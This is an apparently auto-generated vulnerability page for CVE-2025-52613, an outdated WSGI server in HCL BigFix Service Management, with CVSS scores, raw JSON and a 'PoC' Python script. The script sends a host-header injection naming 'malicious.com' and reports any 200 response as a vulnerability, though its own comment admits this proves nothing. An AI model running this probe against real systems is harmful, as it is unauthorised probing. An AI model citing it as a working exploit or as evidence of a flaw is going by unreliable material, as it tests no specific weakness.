Security Vulnerability Report
CVE-2025-52613 CVSS 4.6 MEDIUM

CVE-2025-52613

Published: 2026-05-06 15:16:08
Last Modified: 2026-05-07 14:59:41

Description

HCL BigFix Service Management (SM) is affected by the use of a vulnerable WSGI server. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access.

CVSS Details

Secondary metric (as recorded in the raw JSON data below):
CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Primary metric (also recorded in the raw JSON data below):
CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Weakness: CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Service Management (SM) (refer to the vendor's official advisory to confirm the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit concept for vulnerable WSGI server.
# This script attempts to send a malformed request often associated with
# WSGI parsing issues.
target_url = "http://target-hcl-bigfix:8080"

# Example payload: Host header injection or request smuggling attempt
headers = {
    "User-Agent": "CVE-2025-52613-Test",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Forwarded-Host": "malicious.com",
}
payload = "test=data"

try:
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print("Response Headers:", response.headers)
    # A 200 only shows that the server accepted the request; it does not by
    # itself confirm that the WSGI server in use is a vulnerable version.
    if response.status_code == 200:
        print("Potential vulnerability detected: Server accepted request.")
except Exception as e:
    print(f"Error: {e}")

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52613", "sourceIdentifier": "[email protected]", "published": "2026-05-06T15:16:08.247", "lastModified": "2026-05-07T14:59:40.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SM) is affected by use of a vulnerable WSGI Server was identified. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}